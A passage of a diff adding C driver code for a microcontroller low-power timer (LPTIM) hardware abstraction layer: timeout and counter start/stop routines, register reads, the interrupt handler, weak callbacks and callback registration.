__HAL_LPTIM_DISABLE_IT(hlptim, LPTIM_IT_UP); + + /* Change the TIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Start the Timeout function. + * @note The first trigger event will start the timer, any successive + * trigger event will reset the counter and the timer restarts. + * @param hlptim LPTIM handle + * @param Period Specifies the Autoreload value. + * This parameter must be a value between 0x0000 and 0xFFFF. + * @param Timeout Specifies the TimeOut value to reset the counter. + * This parameter must be a value between 0x0000 and 0xFFFF. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_TimeOut_Start(LPTIM_HandleTypeDef *hlptim, uint32_t Period, uint32_t Timeout) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + assert_param(IS_LPTIM_PERIOD(Period)); + assert_param(IS_LPTIM_PULSE(Timeout)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Set TIMOUT bit to enable the timeout function */ + hlptim->Instance->CFGR |= LPTIM_CFGR_TIMOUT; + + /* Enable the Peripheral */ + __HAL_LPTIM_ENABLE(hlptim); + + /* Clear flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_ARROK); + + /* Load the period value in the autoreload register */ + __HAL_LPTIM_AUTORELOAD_SET(hlptim, Period); + + /* Wait for the completion of the write operation to the LPTIM_ARR register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_ARROK) == HAL_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Clear flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_CMPOK); + + /* Load the Timeout value in the compare register */ + __HAL_LPTIM_COMPARE_SET(hlptim, Timeout); + + /* Wait for the completion of the write operation to the LPTIM_CMP register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_CMPOK) == HAL_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Start timer in continuous mode */ + __HAL_LPTIM_START_CONTINUOUS(hlptim); + + /* Change the TIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stop the Timeout function. + * @param hlptim LPTIM handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_TimeOut_Stop(LPTIM_HandleTypeDef *hlptim) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Disable the Peripheral */ + __HAL_LPTIM_DISABLE(hlptim); + + if (HAL_LPTIM_GetState(hlptim) == HAL_LPTIM_STATE_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Reset TIMOUT bit to enable the timeout function */ + hlptim->Instance->CFGR &= ~LPTIM_CFGR_TIMOUT; + + /* Change the TIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Start the Timeout function in interrupt mode. + * @note The first trigger event will start the timer, any successive + * trigger event will reset the counter and the timer restarts. + * @param hlptim LPTIM handle + * @param Period Specifies the Autoreload value. + * This parameter must be a value between 0x0000 and 0xFFFF. + * @param Timeout Specifies the TimeOut value to reset the counter. + * This parameter must be a value between 0x0000 and 0xFFFF. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_TimeOut_Start_IT(LPTIM_HandleTypeDef *hlptim, uint32_t Period, uint32_t Timeout) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + assert_param(IS_LPTIM_PERIOD(Period)); + assert_param(IS_LPTIM_PULSE(Timeout)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Enable EXTI Line interrupt on the LPTIM Wake-up Timer */ + __HAL_LPTIM_WAKEUPTIMER_EXTI_ENABLE_IT(); +#if defined(EXTI_IMR_MR23) + /* Enable rising edge trigger on the LPTIM Wake-up Timer Exti line */ + __HAL_LPTIM_WAKEUPTIMER_EXTI_ENABLE_RISING_EDGE(); +#endif /* EXTI_IMR_MR23 */ + + /* Set TIMOUT bit to enable the timeout function */ + hlptim->Instance->CFGR |= LPTIM_CFGR_TIMOUT; + + /* Enable the Peripheral */ + __HAL_LPTIM_ENABLE(hlptim); + + /* Clear flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_ARROK); + + /* Load the period value in the autoreload register */ + __HAL_LPTIM_AUTORELOAD_SET(hlptim, Period); + + /* Wait for the completion of the write operation to the LPTIM_ARR register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_ARROK) == HAL_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Clear flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_CMPOK); + + /* Load the Timeout value in the compare register */ + __HAL_LPTIM_COMPARE_SET(hlptim, Timeout); + + /* Wait for the completion of the write operation to the LPTIM_CMP register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_CMPOK) == HAL_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Disable the Peripheral */ + __HAL_LPTIM_DISABLE(hlptim); + + if (HAL_LPTIM_GetState(hlptim) == HAL_LPTIM_STATE_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Enable Compare match interrupt */ + __HAL_LPTIM_ENABLE_IT(hlptim, LPTIM_IT_CMPM); + + /* Enable the Peripheral */ + __HAL_LPTIM_ENABLE(hlptim); + + /* Start timer in continuous mode */ + __HAL_LPTIM_START_CONTINUOUS(hlptim); + + /* Change the TIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stop the Timeout function in interrupt mode. + * @param hlptim LPTIM handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_TimeOut_Stop_IT(LPTIM_HandleTypeDef *hlptim) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; +#if defined(EXTI_IMR_MR23) + /* Disable rising edge trigger on the LPTIM Wake-up Timer Exti line */ + __HAL_LPTIM_WAKEUPTIMER_EXTI_DISABLE_RISING_EDGE(); +#endif /* EXTI_IMR_MR23 */ + + /* Disable EXTI Line interrupt on the LPTIM Wake-up Timer */ + __HAL_LPTIM_WAKEUPTIMER_EXTI_DISABLE_IT(); + + /* Disable the Peripheral */ + __HAL_LPTIM_DISABLE(hlptim); + + if (HAL_LPTIM_GetState(hlptim) == HAL_LPTIM_STATE_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Reset TIMOUT bit to enable the timeout function */ + hlptim->Instance->CFGR &= ~LPTIM_CFGR_TIMOUT; + + /* Disable Compare match interrupt */ + __HAL_LPTIM_DISABLE_IT(hlptim, LPTIM_IT_CMPM); + + /* Change the TIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Start the Counter mode. + * @param hlptim LPTIM handle + * @param Period Specifies the Autoreload value. + * This parameter must be a value between 0x0000 and 0xFFFF. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_Counter_Start(LPTIM_HandleTypeDef *hlptim, uint32_t Period) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + assert_param(IS_LPTIM_PERIOD(Period)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* If clock source is not ULPTIM clock and counter source is external, then it must not be prescaled */ + if ((hlptim->Init.Clock.Source != LPTIM_CLOCKSOURCE_ULPTIM) + && (hlptim->Init.CounterSource == LPTIM_COUNTERSOURCE_EXTERNAL)) + { + /* Check if clock is prescaled */ + assert_param(IS_LPTIM_CLOCK_PRESCALERDIV1(hlptim->Init.Clock.Prescaler)); + /* Set clock prescaler to 0 */ + hlptim->Instance->CFGR &= ~LPTIM_CFGR_PRESC; + } + + /* Enable the Peripheral */ + __HAL_LPTIM_ENABLE(hlptim); + + /* Clear flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_ARROK); + + /* Load the period value in the autoreload register */ + __HAL_LPTIM_AUTORELOAD_SET(hlptim, Period); + + /* Wait for the completion of the write operation to the LPTIM_ARR register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_ARROK) == HAL_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Start timer in continuous mode */ + __HAL_LPTIM_START_CONTINUOUS(hlptim); + + /* Change the TIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stop the Counter mode. + * @param hlptim LPTIM handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_Counter_Stop(LPTIM_HandleTypeDef *hlptim) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Disable the Peripheral */ + __HAL_LPTIM_DISABLE(hlptim); + + if (HAL_LPTIM_GetState(hlptim) == HAL_LPTIM_STATE_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Change the TIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Start the Counter mode in interrupt mode. + * @param hlptim LPTIM handle + * @param Period Specifies the Autoreload value. + * This parameter must be a value between 0x0000 and 0xFFFF. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_Counter_Start_IT(LPTIM_HandleTypeDef *hlptim, uint32_t Period) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + assert_param(IS_LPTIM_PERIOD(Period)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; + + /* Enable EXTI Line interrupt on the LPTIM Wake-up Timer */ + __HAL_LPTIM_WAKEUPTIMER_EXTI_ENABLE_IT(); +#if defined(EXTI_IMR_MR23) + /* Enable rising edge trigger on the LPTIM Wake-up Timer Exti line */ + __HAL_LPTIM_WAKEUPTIMER_EXTI_ENABLE_RISING_EDGE(); +#endif /* EXTI_IMR_MR23 */ + + /* If clock source is not ULPTIM clock and counter source is external, then it must not be prescaled */ + if ((hlptim->Init.Clock.Source != LPTIM_CLOCKSOURCE_ULPTIM) + && (hlptim->Init.CounterSource == LPTIM_COUNTERSOURCE_EXTERNAL)) + { + /* Check if clock is prescaled */ + assert_param(IS_LPTIM_CLOCK_PRESCALERDIV1(hlptim->Init.Clock.Prescaler)); + /* Set clock prescaler to 0 */ + hlptim->Instance->CFGR &= ~LPTIM_CFGR_PRESC; + } + + /* Enable the Peripheral */ + __HAL_LPTIM_ENABLE(hlptim); + + /* Clear flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_ARROK); + + /* Load the period value in the autoreload register */ + __HAL_LPTIM_AUTORELOAD_SET(hlptim, Period); + + /* Wait for the completion of the write operation to the LPTIM_ARR register */ + if (LPTIM_WaitForFlag(hlptim, LPTIM_FLAG_ARROK) == HAL_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Disable the Peripheral */ + __HAL_LPTIM_DISABLE(hlptim); + + if (HAL_LPTIM_GetState(hlptim) == HAL_LPTIM_STATE_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Enable Autoreload write complete interrupt */ + __HAL_LPTIM_ENABLE_IT(hlptim, LPTIM_IT_ARROK); + + /* Enable Autoreload match interrupt */ + __HAL_LPTIM_ENABLE_IT(hlptim, LPTIM_IT_ARRM); + + /* Enable the Peripheral */ + __HAL_LPTIM_ENABLE(hlptim); + + /* Start timer in continuous mode */ + __HAL_LPTIM_START_CONTINUOUS(hlptim); + + /* Change the TIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stop the Counter mode in interrupt mode. + * @param hlptim LPTIM handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LPTIM_Counter_Stop_IT(LPTIM_HandleTypeDef *hlptim) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + + /* Set the LPTIM state */ + hlptim->State = HAL_LPTIM_STATE_BUSY; +#if defined(EXTI_IMR_MR23) + /* Disable rising edge trigger on the LPTIM Wake-up Timer Exti line */ + __HAL_LPTIM_WAKEUPTIMER_EXTI_DISABLE_RISING_EDGE(); +#endif /* EXTI_IMR_MR23 */ + + /* Disable EXTI Line interrupt on the LPTIM Wake-up Timer */ + __HAL_LPTIM_WAKEUPTIMER_EXTI_DISABLE_IT(); + + /* Disable the Peripheral */ + __HAL_LPTIM_DISABLE(hlptim); + + if (HAL_LPTIM_GetState(hlptim) == HAL_LPTIM_STATE_TIMEOUT) + { + return HAL_TIMEOUT; + } + + /* Disable Autoreload write complete interrupt */ + __HAL_LPTIM_DISABLE_IT(hlptim, LPTIM_IT_ARROK); + + /* Disable Autoreload match interrupt */ + __HAL_LPTIM_DISABLE_IT(hlptim, LPTIM_IT_ARRM); + /* Change the TIM state*/ + hlptim->State = HAL_LPTIM_STATE_READY; + + /* Return function status */ + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup LPTIM_Exported_Functions_Group3 LPTIM Read operation functions + * @brief Read operation functions. + * +@verbatim + ============================================================================== + ##### LPTIM Read operation functions ##### + ============================================================================== +[..] This section provides LPTIM Reading functions. + (+) Read the counter value. + (+) Read the period (Auto-reload) value. + (+) Read the pulse (Compare)value. +@endverbatim + * @{ + */ + +/** + * @brief Return the current counter value. + * @param hlptim LPTIM handle + * @retval Counter value. + */ +uint32_t HAL_LPTIM_ReadCounter(LPTIM_HandleTypeDef *hlptim) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + + return (hlptim->Instance->CNT); +} + +/** + * @brief Return the current Autoreload (Period) value. + * @param hlptim LPTIM handle + * @retval Autoreload value. + */ +uint32_t HAL_LPTIM_ReadAutoReload(LPTIM_HandleTypeDef *hlptim) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + + return (hlptim->Instance->ARR); +} + +/** + * @brief Return the current Compare (Pulse) value. + * @param hlptim LPTIM handle + * @retval Compare value. + */ +uint32_t HAL_LPTIM_ReadCompare(LPTIM_HandleTypeDef *hlptim) +{ + /* Check the parameters */ + assert_param(IS_LPTIM_INSTANCE(hlptim->Instance)); + + return (hlptim->Instance->CMP); +} + +/** + * @} + */ + +/** @defgroup LPTIM_Exported_Functions_Group4 LPTIM IRQ handler and callbacks + * @brief LPTIM IRQ handler. + * +@verbatim + ============================================================================== + ##### LPTIM IRQ handler and callbacks ##### + ============================================================================== +[..] This section provides LPTIM IRQ handler and callback functions called within + the IRQ handler: + (+) LPTIM interrupt request handler + (+) Compare match Callback + (+) Auto-reload match Callback + (+) External trigger event detection Callback + (+) Compare register write complete Callback + (+) Auto-reload register write complete Callback + (+) Up-counting direction change Callback + (+) Down-counting direction change Callback + +@endverbatim + * @{ + */ + +/** + * @brief Handle LPTIM interrupt request. + * @param hlptim LPTIM handle + * @retval None + */ +void HAL_LPTIM_IRQHandler(LPTIM_HandleTypeDef *hlptim) +{ + /* Compare match interrupt */ + if (__HAL_LPTIM_GET_FLAG(hlptim, LPTIM_FLAG_CMPM) != RESET) + { + if (__HAL_LPTIM_GET_IT_SOURCE(hlptim, LPTIM_IT_CMPM) != RESET) + { + /* Clear Compare match flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_CMPM); + + /* Compare match Callback */ +#if (USE_HAL_LPTIM_REGISTER_CALLBACKS == 1) + hlptim->CompareMatchCallback(hlptim); +#else + HAL_LPTIM_CompareMatchCallback(hlptim); +#endif /* USE_HAL_LPTIM_REGISTER_CALLBACKS */ + } + } + + /* Autoreload match interrupt */ + if (__HAL_LPTIM_GET_FLAG(hlptim, LPTIM_FLAG_ARRM) != RESET) + { + if (__HAL_LPTIM_GET_IT_SOURCE(hlptim, LPTIM_IT_ARRM) != RESET) + { + /* Clear Autoreload match flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_ARRM); + + /* Autoreload match Callback */ +#if (USE_HAL_LPTIM_REGISTER_CALLBACKS == 1) + hlptim->AutoReloadMatchCallback(hlptim); +#else + HAL_LPTIM_AutoReloadMatchCallback(hlptim); +#endif /* USE_HAL_LPTIM_REGISTER_CALLBACKS */ + } + } + + /* Trigger detected interrupt */ + if (__HAL_LPTIM_GET_FLAG(hlptim, LPTIM_FLAG_EXTTRIG) != RESET) + { + if (__HAL_LPTIM_GET_IT_SOURCE(hlptim, LPTIM_IT_EXTTRIG) != RESET) + { + /* Clear Trigger detected flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_EXTTRIG); + + /* Trigger detected callback */ +#if (USE_HAL_LPTIM_REGISTER_CALLBACKS == 1) + hlptim->TriggerCallback(hlptim); +#else + HAL_LPTIM_TriggerCallback(hlptim); +#endif /* USE_HAL_LPTIM_REGISTER_CALLBACKS */ + } + } + + /* Compare write interrupt */ + if (__HAL_LPTIM_GET_FLAG(hlptim, LPTIM_FLAG_CMPOK) != RESET) + { + if (__HAL_LPTIM_GET_IT_SOURCE(hlptim, LPTIM_IT_CMPOK) != RESET) + { + /* Clear Compare write flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_CMPOK); + + /* Compare write Callback */ +#if (USE_HAL_LPTIM_REGISTER_CALLBACKS == 1) + hlptim->CompareWriteCallback(hlptim); +#else + HAL_LPTIM_CompareWriteCallback(hlptim); +#endif /* USE_HAL_LPTIM_REGISTER_CALLBACKS */ + } + } + + /* Autoreload write interrupt */ + if (__HAL_LPTIM_GET_FLAG(hlptim, LPTIM_FLAG_ARROK) != RESET) + { + if (__HAL_LPTIM_GET_IT_SOURCE(hlptim, LPTIM_IT_ARROK) != RESET) + { + /* Clear Autoreload write flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_ARROK); + + /* Autoreload write Callback */ +#if (USE_HAL_LPTIM_REGISTER_CALLBACKS == 1) + hlptim->AutoReloadWriteCallback(hlptim); +#else + HAL_LPTIM_AutoReloadWriteCallback(hlptim); +#endif /* USE_HAL_LPTIM_REGISTER_CALLBACKS */ + } + } + + /* Direction counter changed from Down to Up interrupt */ + if (__HAL_LPTIM_GET_FLAG(hlptim, LPTIM_FLAG_UP) != RESET) + { + if (__HAL_LPTIM_GET_IT_SOURCE(hlptim, LPTIM_IT_UP) != RESET) + { + /* Clear Direction counter changed from Down to Up flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_UP); + + /* Direction counter changed from Down to Up Callback */ +#if (USE_HAL_LPTIM_REGISTER_CALLBACKS == 1) + hlptim->DirectionUpCallback(hlptim); +#else + HAL_LPTIM_DirectionUpCallback(hlptim); +#endif /* USE_HAL_LPTIM_REGISTER_CALLBACKS */ + } + } + + /* Direction counter changed from Up to Down interrupt */ + if (__HAL_LPTIM_GET_FLAG(hlptim, LPTIM_FLAG_DOWN) != RESET) + { + if (__HAL_LPTIM_GET_IT_SOURCE(hlptim, LPTIM_IT_DOWN) != RESET) + { + /* Clear Direction counter changed from Up to Down flag */ + __HAL_LPTIM_CLEAR_FLAG(hlptim, LPTIM_FLAG_DOWN); + + /* Direction counter changed from Up to Down Callback */ +#if (USE_HAL_LPTIM_REGISTER_CALLBACKS == 1) + hlptim->DirectionDownCallback(hlptim); +#else + HAL_LPTIM_DirectionDownCallback(hlptim); +#endif /* USE_HAL_LPTIM_REGISTER_CALLBACKS */ + } + } +#if defined(EXTI_IMR_MR23) + __HAL_LPTIM_WAKEUPTIMER_EXTI_CLEAR_FLAG(); +#endif /* EXTI_IMR_MR23 */ +} + +/** + * @brief Compare match callback in non-blocking mode. + * @param hlptim LPTIM handle + * @retval None + */ +__weak void HAL_LPTIM_CompareMatchCallback(LPTIM_HandleTypeDef *hlptim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hlptim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_LPTIM_CompareMatchCallback could be implemented in the user file + */ +} + +/** + * @brief Autoreload match callback in non-blocking mode. + * @param hlptim LPTIM handle + * @retval None + */ +__weak void HAL_LPTIM_AutoReloadMatchCallback(LPTIM_HandleTypeDef *hlptim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hlptim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_LPTIM_AutoReloadMatchCallback could be implemented in the user file + */ +} + +/** + * @brief Trigger detected callback in non-blocking mode. + * @param hlptim LPTIM handle + * @retval None + */ +__weak void HAL_LPTIM_TriggerCallback(LPTIM_HandleTypeDef *hlptim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hlptim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_LPTIM_TriggerCallback could be implemented in the user file + */ +} + +/** + * @brief Compare write callback in non-blocking mode. + * @param hlptim LPTIM handle + * @retval None + */ +__weak void HAL_LPTIM_CompareWriteCallback(LPTIM_HandleTypeDef *hlptim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hlptim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_LPTIM_CompareWriteCallback could be implemented in the user file + */ +} + +/** + * @brief Autoreload write callback in non-blocking mode. + * @param hlptim LPTIM handle + * @retval None + */ +__weak void HAL_LPTIM_AutoReloadWriteCallback(LPTIM_HandleTypeDef *hlptim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hlptim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_LPTIM_AutoReloadWriteCallback could be implemented in the user file + */ +} + +/** + * @brief Direction counter changed from Down to Up callback in non-blocking mode. + * @param hlptim LPTIM handle + * @retval None + */ +__weak void HAL_LPTIM_DirectionUpCallback(LPTIM_HandleTypeDef *hlptim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hlptim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_LPTIM_DirectionUpCallback could be implemented in the user file + */ +} + +/** + * @brief Direction counter changed from Up to Down callback in non-blocking mode. + * @param hlptim LPTIM handle + * @retval None + */ +__weak void HAL_LPTIM_DirectionDownCallback(LPTIM_HandleTypeDef *hlptim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hlptim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_LPTIM_DirectionDownCallback could be implemented in the user file + */ +} + +#if (USE_HAL_LPTIM_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User LPTIM callback to be used instead of the weak predefined callback + * @param hlptim LPTIM handle + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_LPTIM_MSPINIT_CB_ID LPTIM Base Msp Init Callback ID + * @arg @ref HAL_LPTIM_MSPDEINIT_CB_ID LPTIM Base Msp DeInit Callback ID + * @arg @ref HAL_LPTIM_COMPARE_MATCH_CB_ID Compare match Callback ID + * @arg @ref HAL_LPTIM_AUTORELOAD_MATCH_CB_ID Auto-reload match Callback ID + * @arg @ref HAL_LPTIM_TRIGGER_CB_ID External trigger event detection Callback ID + * @arg @ref HAL_LPTIM_COMPARE_WRITE_CB_ID Compare register write complete Callback ID + * @arg @ref HAL_LPTIM_AUTORELOAD_WRITE_CB_ID Auto-reload register write complete Callback ID + * @arg @ref HAL_LPTIM_DIRECTION_UP_CB_ID Up-counting direction change Callback ID + * @arg @ref HAL_LPTIM_DIRECTION_DOWN_CB_ID Down-counting direction change Callback ID + * @param pCallback pointer to the callback function + * @retval status + */ +HAL_StatusTypeDef HAL_LPTIM_RegisterCallback(LPTIM_HandleTypeDef *hlptim, + HAL_LPTIM_CallbackIDTypeDef CallbackID, + pLPTIM_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hlptim); + + if (hlptim->State == HAL_LPTIM_STATE_READY) + { + switch (CallbackID) + { + case HAL_LPTIM_MSPINIT_CB_ID : + hlptim->MspInitCallback = pCallback; + break; + + case HAL_LPTIM_MSPDEINIT_CB_ID : + hlptim->MspDeInitCallback = pCallback; + break; + + case HAL_LPTIM_COMPARE_MATCH_CB_ID : + hlptim->CompareMatchCallback = pCallback; + break; + + case HAL_LPTIM_AUTORELOAD_MATCH_CB_ID : + hlptim->AutoReloadMatchCallback = pCallback; + break; + + case HAL_LPTIM_TRIGGER_CB_ID : + hlptim->TriggerCallback = pCallback; + break; + + case HAL_LPTIM_COMPARE_WRITE_CB_ID : + hlptim->CompareWriteCallback = pCallback; + break; + + case HAL_LPTIM_AUTORELOAD_WRITE_CB_ID : + hlptim->AutoReloadWriteCallback = pCallback; + break; + + case HAL_LPTIM_DIRECTION_UP_CB_ID : + hlptim->DirectionUpCallback = pCallback; + break; + + case HAL_LPTIM_DIRECTION_DOWN_CB_ID : + hlptim->DirectionDownCallback = pCallback; + break; + + default : + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (hlptim->State == HAL_LPTIM_STATE_RESET) + { + switch (CallbackID) + { + case HAL_LPTIM_MSPINIT_CB_ID : + hlptim->MspInitCallback = pCallback; + break; + + case HAL_LPTIM_MSPDEINIT_CB_ID : + hlptim->MspDeInitCallback = pCallback; + break; + + default : + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hlptim); + + return status; +} + +/** + * @brief Unregister a LPTIM callback + * LLPTIM callback is redirected to the weak predefined callback + * @param hlptim LPTIM handle + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_LPTIM_MSPINIT_CB_ID LPTIM Base Msp Init Callback ID + * @arg @ref HAL_LPTIM_MSPDEINIT_CB_ID LPTIM Base Msp DeInit Callback ID + * @arg @ref HAL_LPTIM_COMPARE_MATCH_CB_ID Compare match Callback ID + * @arg @ref HAL_LPTIM_AUTORELOAD_MATCH_CB_ID Auto-reload match Callback ID + * @arg @ref HAL_LPTIM_TRIGGER_CB_ID External trigger event detection Callback ID + * @arg @ref HAL_LPTIM_COMPARE_WRITE_CB_ID Compare register write complete Callback ID + * @arg @ref HAL_LPTIM_AUTORELOAD_WRITE_CB_ID Auto-reload register write complete Callback ID + * @arg @ref HAL_LPTIM_DIRECTION_UP_CB_ID Up-counting direction change Callback ID + * @arg @ref HAL_LPTIM_DIRECTION_DOWN_CB_ID Down-counting direction change Callback ID + * @retval status + */ +HAL_StatusTypeDef HAL_LPTIM_UnRegisterCallback(LPTIM_HandleTypeDef *hlptim, + HAL_LPTIM_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hlptim); + + if (hlptim->State == HAL_LPTIM_STATE_READY) + { + switch (CallbackID) + { + case HAL_LPTIM_MSPINIT_CB_ID : + /* Legacy weak MspInit Callback */ + hlptim->MspInitCallback = HAL_LPTIM_MspInit; + break; + + case HAL_LPTIM_MSPDEINIT_CB_ID : + /* Legacy weak Msp DeInit Callback */ + hlptim->MspDeInitCallback = HAL_LPTIM_MspDeInit; + break; + + case HAL_LPTIM_COMPARE_MATCH_CB_ID : + /* Legacy weak Compare match Callback */ + hlptim->CompareMatchCallback = HAL_LPTIM_CompareMatchCallback; + break; + + case HAL_LPTIM_AUTORELOAD_MATCH_CB_ID : + /* Legacy weak Auto-reload match Callback */ + hlptim->AutoReloadMatchCallback = HAL_LPTIM_AutoReloadMatchCallback; + break; + + case HAL_LPTIM_TRIGGER_CB_ID : + /* Legacy weak External trigger event detection Callback */ + hlptim->TriggerCallback = HAL_LPTIM_TriggerCallback; + break; + + case HAL_LPTIM_COMPARE_WRITE_CB_ID : + /* Legacy weak Compare register write complete Callback */ + hlptim->CompareWriteCallback = HAL_LPTIM_CompareWriteCallback; + break; + + case HAL_LPTIM_AUTORELOAD_WRITE_CB_ID : + /* Legacy weak Auto-reload register write complete Callback */ + hlptim->AutoReloadWriteCallback = HAL_LPTIM_AutoReloadWriteCallback; + break; + + case HAL_LPTIM_DIRECTION_UP_CB_ID : + /* Legacy weak Up-counting direction change Callback */ + hlptim->DirectionUpCallback = HAL_LPTIM_DirectionUpCallback; + break; + + case HAL_LPTIM_DIRECTION_DOWN_CB_ID : + /* Legacy weak Down-counting direction change Callback */ + hlptim->DirectionDownCallback = HAL_LPTIM_DirectionDownCallback; + break; + + default : + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (hlptim->State == HAL_LPTIM_STATE_RESET) + { + switch (CallbackID) + { + case HAL_LPTIM_MSPINIT_CB_ID : + /* Legacy weak MspInit Callback */ + hlptim->MspInitCallback = HAL_LPTIM_MspInit; + break; + + case HAL_LPTIM_MSPDEINIT_CB_ID : + /* Legacy weak Msp DeInit Callback */ + hlptim->MspDeInitCallback = HAL_LPTIM_MspDeInit; + break; + + default : + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hlptim); + + return status; +} +#endif /* USE_HAL_LPTIM_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @defgroup LPTIM_Group5 Peripheral State functions + * @brief Peripheral State functions. + * +@verbatim + ============================================================================== + ##### Peripheral State functions ##### + ============================================================================== + [..] + This subsection permits to get in run-time the status of the peripheral. + +@endverbatim + * @{ + */ + 